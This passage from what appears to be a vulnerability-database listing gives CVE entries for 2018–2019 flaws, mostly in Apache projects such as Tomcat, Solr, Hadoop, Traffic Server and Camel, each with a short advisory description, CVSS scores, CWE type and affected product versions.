Certain input files could make the code to enter into an infinite loop when Apache Sanselan 0.97-incubator was used to parse them, which could be used in a DoS attack. Note that Apache Sanselan (incubating) was renamed to Apache Commons Imaging.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-835,

Products Affected

Vendor Product Version
apache commons_imaging 0.97
CVE-2018-20242 MEDIUM

A carefully crafted URL could trigger an XSS vulnerability on Apache JSPWiki, from versions up to 2.10.5, which could lead to session hijacking.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache jspwiki *
CVE-2018-20243 MEDIUM

The implementation of POST with the username and password in the URL parameters exposed the credentials. More infomration is available in fineract jira issues 726 and 629.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-522,

Products Affected

Vendor Product Version
apache fineract 0.4.0
apache fineract *
apache fineract 0.6.0
apache fineract 0.5.0
CVE-2018-20244 LOW

In Apache Airflow before 1.10.2, a malicious admin user could edit the state of objects in the Airflow metadata database to execute arbitrary javascript on certain page views.

CVSS 2.0

Severity: LOW

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache airflow *
CVE-2018-20245 MEDIUM

The LDAP auth backend (airflow.contrib.auth.backends.ldap_auth) prior to Apache Airflow 1.10.1 was misconfigured and contained improper checking of exceptions which disabled server certificate checking.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-295,

Products Affected

Vendor Product Version
apache airflow *
CVE-2018-21234 HIGH

Jodd before 5.0.4 performs Deserialization of Untrusted JSON Data when setClassMetadataName is set.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

CVSS 2.0

Severity: HIGH

Problem Type: CWE-502,

Products Affected

Vendor Product Version
apache hive 3.1.2
jodd jodd *
CVE-2018-2799 MEDIUM

Vulnerability in the Java SE, Java SE Embedded, JRockit component of Oracle Java SE (subcomponent: JAXP). Supported versions that are affected are Java SE: 7u171, 8u162 and 10; Java SE Embedded: 8u161; JRockit: R28.3.17. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded, JRockit. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Java SE, Java SE Embedded, JRockit. Note: Applies to client and server deployment of Java. This vulnerability can be exploited through sandboxed Java Web Start applications and sandboxed Java applets. It can also be exploited by supplying data to APIs in the specified Component without using sandboxed Java Web Start applications or sandboxed Java applets, such as through a web service. CVSS 3.0 Base Score 5.3 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L).

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 5.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L 3.9 1.4

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
redhat enterprise_linux_server_tus 7.6
oracle jre 1.8.0
apache xerces-j *
redhat enterprise_linux_server 6.0
canonical ubuntu_linux 14.04
redhat enterprise_linux_desktop 7.0
redhat enterprise_linux_server_aus 7.6
redhat enterprise_linux_workstation 7.0
redhat satellite 5.8
schneider-electric struxureware_data_center_expert *
oracle jre 1.7.0
oracle jdk 10
oracle jre 10
debian debian_linux 9.0
oracle jdk 1.8.0
redhat satellite 5.7
redhat enterprise_linux_server_eus 7.5
hp xp7_command_view *
redhat enterprise_linux_desktop 6.0
debian debian_linux 8.0
canonical ubuntu_linux 17.10
oracle jdk 1.7.0
canonical ubuntu_linux 16.04
redhat enterprise_linux_workstation 6.0
redhat enterprise_linux_server_eus 7.6
oracle jrockit r28.3.17
redhat satellite 5.6
redhat enterprise_linux_server 7.0
CVE-2018-8003 MEDIUM

Apache Ambari, versions 1.4.0 to 2.6.1, is susceptible to a directory traversal attack allowing an unauthenticated user to craft an HTTP request which provides read-only access to any file on the filesystem of the host the Ambari Server runs on that is accessible by the user the Ambari Server is running as. Direct network access to the Ambari Server is required to issue this request, and those Ambari Servers that are protected behind a firewall, or in a restricted network zone are at less risk of being affected by this issue.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-22,

Products Affected

Vendor Product Version
apache ambari *
CVE-2018-8004 MEDIUM

There are multiple HTTP smuggling and cache poisoning issues when clients making malicious requests interact with Apache Traffic Server (ATS). This affects versions 6.0.0 to 6.2.2 and 7.0.0 to 7.1.3. To resolve this issue users running 6.x should upgrade to 6.2.3 or later versions and 7.x users should upgrade to 7.1.4 or later versions.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-444,

Products Affected

Vendor Product Version
debian debian_linux 9.0
apache traffic_server *
CVE-2018-8005 MEDIUM

When there are multiple ranges in a range request, Apache Traffic Server (ATS) will read the entire object from cache. This can cause performance problems with large objects in cache. This affects versions 6.0.0 to 6.2.2 and 7.0.0 to 7.1.3. To resolve this issue users running 6.x users should upgrade to 6.2.3 or later versions and 7.x users should upgrade to 7.1.4 or later versions.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-400,

Products Affected

Vendor Product Version
debian debian_linux 9.0
apache traffic_server *
CVE-2018-8006 MEDIUM

An instance of a cross-site scripting vulnerability was identified to be present in the web based administration console on the queue.jsp page of Apache ActiveMQ versions 5.0.0 to 5.15.5. The root cause of this issue is improper data filtering of the QueueFilter parameter.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 6.1 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N 2.8 2.7

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache activemq *
CVE-2018-8007 HIGH

Apache CouchDB administrative users can configure the database server via HTTP(S). Due to insufficient validation of administrator-supplied configuration settings via the HTTP API, it is possible for a CouchDB administrator user to escalate their privileges to that of the operating system's user that CouchDB runs under, by bypassing the blacklist of configuration settings that are not allowed to be modified via the HTTP API. This privilege escalation effectively allows an existing CouchDB admin user to gain arbitrary remote code execution, bypassing already disclosed CVE-2017-12636. Mitigation: All users should upgrade to CouchDB releases 1.7.2 or 2.1.2.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-20,

Products Affected

Vendor Product Version
apache couchdb *
CVE-2018-8008 MEDIUM

Apache Storm version 1.0.6 and earlier, 1.2.1 and earlier, and version 1.1.2 and earlier expose an arbitrary file write vulnerability, that can be achieved using a specially crafted zip archive (affects other archives as well, bzip2, tar, xz, war, cpio, 7z), that holds path traversal filenames. So when the filename gets concatenated to the target extraction directory, the final path ends up outside of the target folder.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-22,

Products Affected

Vendor Product Version
apache storm *
CVE-2018-8009 MEDIUM

Apache Hadoop 3.1.0, 3.0.0-alpha to 3.0.2, 2.9.0 to 2.9.1, 2.8.0 to 2.8.4, 2.0.0-alpha to 2.7.6, 0.23.0 to 0.23.11 is exploitable via the zip slip vulnerability in places that accept a zip file.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-22,

Products Affected

Vendor Product Version
apache hadoop 2.0.0
apache hadoop 3.1.0
apache hadoop *
apache hadoop 3.0.0
CVE-2018-8010 LOW

This vulnerability in Apache Solr 6.0.0 to 6.6.3, 7.0.0 to 7.3.0 relates to an XML external entity expansion (XXE) in Solr config files (solrconfig.xml, schema.xml, managed-schema). In addition, Xinclude functionality provided in these config files is also affected in a similar way. The vulnerability can be used as XXE using file/ftp/http protocols in order to read arbitrary local files from the Solr server or the internal network. Users are advised to upgrade to either Solr 6.6.4 or Solr 7.3.1 releases both of which address the vulnerability. Once upgrade is complete, no other steps are required. Those releases only allow external entities and Xincludes that refer to local files / zookeeper resources below the Solr instance directory (using Solr's ResourceLoader); usage of absolute URLs is denied. Keep in mind, that external entities and XInclude are explicitly supported to better structure config files in large installations. Before Solr 6 this was no problem, as config files were not accessible through the APIs.

CVSS 2.0

Severity: LOW

Problem Type: CWE-611,

Products Affected

Vendor Product Version
apache solr *
CVE-2018-8011 MEDIUM

By specially crafting HTTP requests, the mod_md challenge handler would dereference a NULL pointer and cause the child process to segfault. This could be used to DoS the server. Fixed in Apache HTTP Server 2.4.34 (Affected 2.4.33).

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-476,

Products Affected

Vendor Product Version
netapp cloud_backup -
apache http_server 2.4.33
CVE-2018-8012 MEDIUM

No authentication/authorization is enforced when a server attempts to join a quorum in Apache ZooKeeper before 3.4.10, and 3.5.0-alpha through 3.5.3-beta. As a result an arbitrary end point could join the cluster and begin propagating counterfeit changes to the leader.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-862,

Products Affected

Vendor Product Version
apache zookeeper 3.5.0
debian debian_linux 9.0
apache zookeeper *
oracle goldengate_stream_analytics *
apache zookeeper 3.5.3
debian debian_linux 8.0
CVE-2018-8013 HIGH

In Apache Batik 1.x before 1.10, when deserializing subclass of `AbstractDocument`, the class takes a string from the inputStream as the class name which then use it to call the no-arg constructor of the class. Fix was to check the class type before calling newInstance in deserialization.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-502,

Products Affected

Vendor Product Version
oracle communications_metasolv_solution 6.3.0
apache batik *
oracle enterprise_repository 11.1.1.7.0
oracle financial_services_analytical_applications_infrastructure *
oracle insurance_policy_administration_j2ee 10.2
oracle instantis_enterprisetrack 17.1
oracle communications_webrtc_session_controller *
oracle communications_diameter_signaling_router *
oracle enterprise_repository 12.1.3.0.0
oracle retail_central_office 14.1
oracle business_intelligence 12.2.1.4.0
canonical ubuntu_linux 14.04
oracle business_intelligence 11.1.1.7.0
oracle business_intelligence 11.1.1.9.0
oracle instantis_enterprisetrack 17.3
oracle business_intelligence 12.2.1.3.0
oracle retail_order_broker 15.0
oracle retail_returns_management 14.1
oracle insurance_policy_administration_j2ee 10.0
debian debian_linux 9.0
oracle retail_point-of-service 14.0
oracle retail_back_office 13.3
oracle retail_order_broker 16.0
debian debian_linux 7.0
oracle retail_point-of-service 13.4
oracle retail_back_office 13.4
oracle retail_order_broker 5.1
debian debian_linux 8.0
oracle fusion_middleware_mapviewer 12.2.1.3
oracle fusion_middleware_mapviewer 12.2.1.2
oracle insurance_calculation_engine 10.1.1
oracle retail_point-of-service 14.1
oracle jd_edwards_enterpriseone_tools 9.2
oracle instantis_enterprisetrack 17.2
oracle data_integrator 12.2.1.3.0
oracle insurance_calculation_engine 10.2.1
oracle retail_integration_bus 17.0
oracle retail_back_office 14.1
oracle retail_order_broker 5.2
oracle retail_back_office 14
CVE-2018-8014 HIGH

The defaults settings for the CORS filter provided in Apache Tomcat 9.0.0.M1 to 9.0.8, 8.5.0 to 8.5.31, 8.0.0.RC1 to 8.0.52, 7.0.41 to 7.0.88 are insecure and enable 'supportsCredentials' for all origins. It is expected that users of the CORS filter will have configured it appropriately for their environment rather than using it in the default configuration. Therefore, it is expected that most users will not be impacted by this issue.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-1188,

Products Affected

Vendor Product Version
canonical ubuntu_linux 18.04
netapp storage_automation_store -
apache tomcat 8.0.0
debian debian_linux 8.0
canonical ubuntu_linux 17.10
netapp snapcenter_server -
netapp oncommand_unified_manager *
apache tomcat *
canonical ubuntu_linux 16.04
netapp oncommand_insight -
canonical ubuntu_linux 14.04
apache tomcat 9.0.0
netapp oncommand_workflow_automation -
CVE-2018-8015 MEDIUM

In Apache ORC 1.0.0 to 1.4.3 a malformed ORC file can trigger an endlessly recursive function call in the C++ or Java parser. The impact of this bug is most likely denial-of-service against software that uses the ORC file parser. With the C++ parser, the stack overflow might possibly corrupt the stack.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-674,

Products Affected

Vendor Product Version
apache orc *
CVE-2018-8016 HIGH

The default configuration in Apache Cassandra 3.8 through 3.11.1 binds an unauthenticated JMX/RMI interface to all network interfaces, which allows remote attackers to execute arbitrary Java code via an RMI request. This issue is a regression of CVE-2015-0225. The regression was introduced in https://issues.apache.org/jira/browse/CASSANDRA-12109. The fix for the regression is implemented in https://issues.apache.org/jira/browse/CASSANDRA-14173. This fix is contained in the 3.11.2 release of Apache Cassandra.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-306,

Products Affected

Vendor Product Version
apache cassandra *
CVE-2018-8017 MEDIUM

In Apache Tika 1.2 to 1.18, a carefully crafted file can trigger an infinite loop in the IptcAnpaParser.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-835,

Products Affected

Vendor Product Version
apache tika *
CVE-2018-8018 HIGH

In Apache Ignite before 2.4.8 and 2.5.x before 2.5.3, the serialization mechanism does not have a list of classes allowed for serialization/deserialization, which makes it possible to run arbitrary code when 3-rd party vulnerable classes are present in Ignite classpath. The vulnerability can be exploited if the one sends a specially prepared form of a serialized object to GridClientJdkMarshaller deserialization endpoint.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-502,

Products Affected

Vendor Product Version
apache ignite *
CVE-2018-8019 MEDIUM

When using an OCSP responder Apache Tomcat Native 1.2.0 to 1.2.16 and 1.1.23 to 1.1.34 did not correctly handle invalid responses. This allowed for revoked client certificates to be incorrectly identified. It was therefore possible for users to authenticate with revoked certificates when using mutual TLS. Users not using OCSP checks are not affected by this vulnerability.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-295,

Products Affected

Vendor Product Version
apache tomcat_native *
debian debian_linux 8.0
CVE-2018-8020 MEDIUM

Apache Tomcat Native 1.2.0 to 1.2.16 and 1.1.23 to 1.1.34 has a flaw that does not properly check OCSP pre-produced responses, which are lists (multiple entries) of certificate statuses. Subsequently, revoked client certificates may not be properly identified, allowing for users to authenticate with revoked certificates to connections that require mutual TLS. Users not using OCSP checks are not affected by this vulnerability.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-295,

Products Affected

Vendor Product Version
apache tomcat_native *
debian debian_linux 8.0
CVE-2018-8021 HIGH

Versions of Superset prior to 0.23 used an unsafe load method from the pickle library to deserialize data leading to possible remote code execution. Note Superset 0.23 was released prior to any Superset release under the Apache Software Foundation.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-502,

Products Affected

Vendor Product Version
apache superset *
CVE-2018-8022 MEDIUM

A carefully crafted invalid TLS handshake can cause Apache Traffic Server (ATS) to segfault. This affects version 6.2.2. To resolve this issue users running 6.2.2 should upgrade to 6.2.3 or later versions.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-20,

Products Affected

Vendor Product Version
apache traffic_server *
CVE-2018-8023 MEDIUM

Apache Mesos can be configured to require authentication to call the Executor HTTP API using JSON Web Token (JWT). In Apache Mesos versions pre-1.4.2, 1.5.0, 1.5.1, 1.6.0 the comparison of the generated HMAC value against the provided signature in the JWT implementation used is vulnerable to a timing attack because instead of a constant-time string comparison routine a standard `==` operator has been used. A malicious actor can therefore abuse the timing difference of when the JWT validation function returns to reveal the correct HMAC value.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-200,

Products Affected

Vendor Product Version
apache mesos 1.6.0
apache mesos 1.5.0
apache mesos *
apache mesos 1.5.1
CVE-2018-8024 MEDIUM

In Apache Spark 2.1.0 to 2.1.2, 2.2.0 to 2.2.1, and 2.3.0, it's possible for a malicious user to construct a URL pointing to a Spark cluster's UI's job and stage info pages, and if a user can be tricked into accessing the URL, can be used to cause script to execute and expose information from the user's view of the Spark UI. While some browsers like recent versions of Chrome and Safari are able to block this type of attack, current versions of Firefox (and possibly others) do not.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-200,

Products Affected

Vendor Product Version
apache spark 2.3.0
mozilla firefox -
apache spark *
CVE-2018-8025 MEDIUM

CVE-2018-8025 describes an issue in Apache HBase that affects the optional "Thrift 1" API server when running over HTTP. There is a race-condition which could lead to authenticated sessions being incorrectly applied to users, e.g. one authenticated user would be considered a different user or an unauthenticated user would be treated as an authenticated user. https://issues.apache.org/jira/browse/HBASE-20664 implements a fix for this issue. It has been fixed in versions: 1.2.6.1, 1.3.2.1, 1.4.5, 2.0.1.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-362,

Products Affected

Vendor Product Version
apache hbase 0.92.0
apache hbase *
CVE-2018-8026 LOW

This vulnerability in Apache Solr 6.0.0 to 6.6.4 and 7.0.0 to 7.3.1 relates to an XML external entity expansion (XXE) in Solr config files (currency.xml, enumsConfig.xml referred from schema.xml, TIKA parsecontext config file). In addition, Xinclude functionality provided in these config files is also affected in a similar way. The vulnerability can be used as XXE using file/ftp/http protocols in order to read arbitrary local files from the Solr server or the internal network. The manipulated files can be uploaded as configsets using Solr's API, allowing to exploit that vulnerability.

CVSS 2.0

Severity: LOW

Problem Type: CWE-611,

Products Affected

Vendor Product Version
netapp storage_automation_store -
netapp snapcenter -
apache solr *
CVE-2018-8027 HIGH

Apache Camel 2.20.0 to 2.20.3 and 2.21.0 Core is vulnerable to XXE in XSD validation processor.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-611,

Products Affected

Vendor Product Version
apache camel *
apache camel 2.21.0
CVE-2018-8028 MEDIUM

An authenticated user can execute ALTER TABLE EXCHANGE PARTITIONS without being authorized by Apache Sentry before 2.0.1. This can allow an attacker unauthorized access to the partitioned data of a Sentry protected table and can allow an attacker to remove data from a Sentry protected table.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-862,

Products Affected

Vendor Product Version
apache sentry *
CVE-2018-8029 HIGH

In Apache Hadoop versions 3.0.0-alpha1 to 3.1.0, 2.9.0 to 2.9.1, and 2.2.0 to 2.8.4, a user who can escalate to yarn user can possibly run arbitrary commands as root user.

CVSS 2.0

Severity: HIGH

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
apache hadoop 2.9.1
apache hadoop *
apache hadoop 3.0.0
apache hadoop 2.9.0
CVE-2018-8030 MEDIUM

A Denial of Service vulnerability was found in Apache Qpid Broker-J versions 7.0.0-7.0.4 when AMQP protocols 0-8, 0-9 or 0-91 are used to publish messages with size greater than allowed maximum message size limit (100MB by default). The broker crashes due to the defect. AMQP protocols 0-10 and 1.0 are not affected.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-20,

Products Affected

Vendor Product Version
apache qpid_broker-j *
CVE-2018-8031 MEDIUM

The Apache TomEE console (tomee-webapp) has a XSS vulnerability which could allow javascript to be executed if the user is given a malicious URL. This web application is typically used to add TomEE features to a Tomcat installation. The TomEE bundles do not ship with this application included. This issue can be mitigated by removing the application after TomEE is setup (if using the application to install TomEE), using one of the provided pre-configured bundles, or by upgrading to TomEE 7.0.5. This issue is resolve in this commit: b8bbf50c23ce97dd64f3a5d77f78f84e47579863.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache tomee *
CVE-2018-8032 MEDIUM

Apache Axis 1.x up to and including 1.4 is vulnerable to a cross-site scripting (XSS) attack in the default servlet/services.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 6.1 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N 2.8 2.7

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79,

Products Affected

Vendor Product Version
oracle communications_design_studio 7.3.4.3.0
oracle communications_order_and_service_management 7.3.0.0.0
oracle communications_design_studio 7.4.0.4.0
oracle secure_global_desktop 5.4
oracle agile_engineering_data_management 6.2.1.0
oracle enterprise_manager_base_platform 13.3.0.0
oracle internet_directory 12.2.1.3.0
oracle policy_automation_connector_for_siebel 10.4.6
oracle communications_design_studio 7.4.1.1.0
oracle communications_element_manager 8.1.1
oracle secure_global_desktop 5.5
oracle flexcube_core_banking 11.10.0
oracle primavera_unifier *
oracle primavera_gateway 17.12.6
oracle tuxedo 12.1.1.0.0
oracle communications_element_manager 8.1.0
oracle hospitality_guest_access 4.2.0
oracle instantis_enterprisetrack 17.3
oracle peoplesoft_enterprise_peopletools 8.57
oracle tuxedo 12.1.3
oracle agile_product_lifecycle_management 9.3.3
oracle siebel_ui_framework *
oracle flexcube_core_banking 11.9.0
debian debian_linux 9.0
oracle webcenter_portal 12.2.1.3.0
oracle enterprise_manager_for_fusion_middleware 12.1.0.5
oracle primavera_unifier 18.8
oracle primavera_unifier 16.1
oracle big_data_discovery 1.6
oracle communications_design_studio 7.3.5.5.0
oracle communications_session_route_manager 8.0.0
oracle application_testing_suite 13.3.0.1
oracle primavera_unifier 19.12
oracle internet_directory 12.2.1.4.0
oracle knowledge *
oracle endeca_information_discovery_studio 3.2.0
oracle enterprise_manager_base_platform 12.1.0.5
oracle flexcube_private_banking 12.1.0
oracle financial_services_compliance_regulatory_reporting *
oracle communications_session_route_manager 8.1.1
oracle financial_services_analytical_applications_infrastructure *
oracle communications_order_and_service_management 7.4
oracle instantis_enterprisetrack 17.1
oracle communications_session_report_manager 8.0.0
oracle hospitality_guest_access 4.2.1
oracle application_testing_suite 13.2.0.1
oracle communications_session_report_manager 8.1.0
oracle real-time_decision_server 3.2.1.0
oracle communications_element_manager 8.0.0
oracle peoplesoft_enterprise_human_capital_management_human_resources 9.2
oracle communications_session_report_manager 8.2.0
oracle primavera_unifier 16.2
oracle rapid_planning 12.1
oracle peoplesoft_enterprise_peopletools 8.58
oracle communications_asap_cartridges 7.2
oracle retail_xstore_point_of_service 7.1
oracle communications_session_route_manager 8.2.0
oracle flexcube_private_banking 12.0.0
oracle retail_order_broker 15.0
oracle communications_network_integrity 7.3.6
oracle communications_asap_cartridges 7.3
apache axis *
oracle communications_session_report_manager 8.1.1
oracle retail_order_broker 16.0
oracle financial_services_funds_transfer_pricing *
oracle agile_product_lifecycle_management_framework 9.3.3
oracle communications_element_manager 8.2.0
oracle peoplesoft_enterprise_peopletools 8.56
oracle primavera_gateway 16.2.11
oracle communications_session_route_manager 8.1.0
oracle flexcube_core_banking 11.8.0
oracle instantis_enterprisetrack 17.2
oracle retail_order_broker 18.0
oracle flexcube_core_banking 11.7.0
oracle rapid_planning 12.2
oracle communications_network_integrity 7.3.5
CVE-2018-8033 MEDIUM

In Apache OFBiz 16.11.01 to 16.11.04, the OFBiz HTTP engine (org.apache.ofbiz.service.engine.HttpEngine.java) handles requests for HTTP services via the /webtools/control/httpService endpoint. Both POST and GET requests to the httpService endpoint may contain three parameters: serviceName, serviceMode, and serviceContext. The exploitation occurs by having DOCTYPEs pointing to external references that trigger a payload that returns secret information from the host.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-200,

Products Affected

Vendor Product Version
apache ofbiz *
CVE-2018-8034 MEDIUM

The host name verification when using TLS with the WebSocket client was missing. It is now enabled by default. Versions Affected: Apache Tomcat 9.0.0.M1 to 9.0.9, 8.5.0 to 8.5.31, 8.0.0.RC1 to 8.0.52, and 7.0.35 to 7.0.88.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-295,CWE-295,

Products Affected

Vendor Product Version
apache tomcat *
canonical ubuntu_linux 16.04
apache tomcat 8.0.0
debian debian_linux 9.0
canonical ubuntu_linux 14.04
apache tomcat 9.0.0
oracle retail_order_broker 5.1
oracle retail_order_broker 15.0
oracle retail_order_broker 5.2
debian debian_linux 8.0
CVE-2018-8035 MEDIUM

This vulnerability relates to the user's browser processing of DUCC webpage input data.The javascript comprising Apache UIMA DUCC (<= 2.2.2) which runs in the user's browser does not sufficiently filter user supplied inputs, which may result in unintended execution of user supplied javascript code.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache uimaducc *
CVE-2018-8036 MEDIUM

In Apache PDFBox 1.8.0 to 1.8.14 and 2.0.0RC1 to 2.0.10, a carefully crafted (or fuzzed) file can trigger an infinite loop which leads to an out of memory exception in Apache PDFBox's AFMParser.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-835,

Products Affected

Vendor Product Version
apache pdfbox 2.0.0
apache pdfbox *
CVE-2018-8037 MEDIUM

If an async request was completed by the application at the same time as the container triggered the async timeout, a race condition existed that could result in a user seeing a response intended for a different user. An additional issue was present in the NIO and NIO2 connectors that did not correctly track the closure of the connection when an async request was completed by the application and timed out by the container at the same time. This could also result in a user seeing a response intended for another user. Versions Affected: Apache Tomcat 9.0.0.M9 to 9.0.9 and 8.5.5 to 8.5.31.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-362,

Products Affected

Vendor Product Version
apache tomcat *
debian debian_linux 9.0
apache tomcat 9.0.0
CVE-2018-8038 MEDIUM

Versions of Apache CXF Fediz prior to 1.4.4 do not fully disable Document Type Declarations (DTDs) when either parsing the Identity Provider response in the application plugins, or in the Identity Provider itself when parsing certain XML-based parameters.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-20,

Products Affected

Vendor Product Version
apache cxf_fediz *
CVE-2018-8039 MEDIUM

It is possible to configure Apache CXF to use the com.sun.net.ssl implementation via 'System.setProperty("java.protocol.handler.pkgs", "com.sun.net.ssl.internal.www.protocol");'. When this system property is set, CXF uses some reflection to try to make the HostnameVerifier work with the old com.sun.net.ssl.HostnameVerifier interface. However, the default HostnameVerifier implementation in CXF does not implement the method in this interface, and an exception is thrown. However, in Apache CXF prior to 3.2.5 and 3.1.16 the exception is caught in the reflection code and not properly propagated. What this means is that if you are using the com.sun.net.ssl stack with CXF, an error with TLS hostname verification will not be thrown, leaving a CXF client subject to man-in-the-middle attacks.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-755,

Products Affected

Vendor Product Version
apache cxf *
redhat jboss_enterprise_application_platform 7.1.0
CVE-2018-8040 MEDIUM

Pages that are rendered using the ESI plugin can have access to the cookie header when the plugin is configured not to allow access. This affects Apache Traffic Server (ATS) versions 6.0.0 to 6.2.2 and 7.0.0 to 7.1.3. To resolve this issue users running 6.x should upgrade to 6.2.3 or later versions and 7.x users should upgrade to 7.1.4 or later versions.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-668,

Products Affected

Vendor Product Version
debian debian_linux 9.0
apache traffic_server *
CVE-2018-8041 MEDIUM

Apache Camel's Mail 2.20.0 through 2.20.3, 2.21.0 through 2.21.1 and 2.22.0 is vulnerable to path traversal.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-22,

Products Affected

Vendor Product Version
apache camel 2.22.0
apache camel *
CVE-2018-8042 MEDIUM

Apache Ambari, version 2.5.0 to 2.6.2, passwords for Hadoop credential stores are exposed in Ambari Agent informational log messages when the credential store feature is enabled for eligible services. For example, Hive and Oozie.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-209,

Products Affected

Vendor Product Version
apache ambari *
CVE-2018-9481

In bta_hd_set_report_act of bta_hd_act.cc, there is a possible out-of-bounds read due to an integer overflow. This could lead to remote information disclosure in the Bluetooth service with no additional execution privileges needed. User interaction is not needed for exploitation.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 6.2 MEDIUM CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N 2.5 3.6

Products Affected

Vendor Product Version
google android 8.0
google android 8.1
google android 9.0
apache traffic_server *
CVE-2019-0186 MEDIUM

The input fields of the Apache Pluto "Chat Room" demo portlet 3.0.0 and 3.0.1 are vulnerable to Cross-Site Scripting (XSS) attacks. Mitigation: * Uninstall the ChatRoomDemo war file - or - * migrate to version 3.1.0 of the chat-room-demo war file

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache pluto 3.0.0
apache pluto 3.0.1
CVE-2019-0187 HIGH

Unauthenticated RCE is possible when JMeter is used in distributed mode (-r or -R command line options). Attacker can establish a RMI connection to a jmeter-server using RemoteJMeterEngine and proceed with an attack using untrusted data deserialization. This only affect tests running in Distributed mode. Note that versions before 4.0 are not able to encrypt traffic between the nodes, nor authenticate the participating nodes so upgrade to JMeter 5.1 is also advised.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-327,CWE-502,

Products Affected

Vendor Product Version
apache jmeter 4.0
apache jmeter 5.0
CVE-2019-0188 MEDIUM

Apache Camel prior to 2.24.0 contains an XML external entity injection (XXE) vulnerability (CWE-611) due to using an outdated vulnerable JSON-lib library. This affects only the camel-xmljson component, which was removed.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-611,

Products Affected

Vendor Product Version
oracle enterprise_manager_base_platform 13.4.0.0
oracle enterprise_data_quality 11.1.1.9.0
apache camel *
oracle flexcube_private_banking 12.0.0
oracle flexcube_private_banking 12.1.0
oracle enterprise_manager_base_platform 13.3.0.0
oracle enterprise_repository 12.1.3.0.0
CVE-2019-0189 HIGH

The java.io.ObjectInputStream is known to cause Java serialisation issues. This issue here is exposed by the "webtools/control/httpService" URL, and uses Java deserialization to perform code execution. In the HttpEngine, the value of the request parameter "serviceContext" is passed to the "deserialize" method of "XmlSerializer". Apache Ofbiz is affected via two different dependencies: "commons-beanutils" and an out-dated version of "commons-fileupload" Mitigation: Upgrade to 16.11.06 or manually apply the commits from OFBIZ-10770 and OFBIZ-10837 on branch 16

CVSS 3.x

Source Score Severity Vector Exploitability Impact
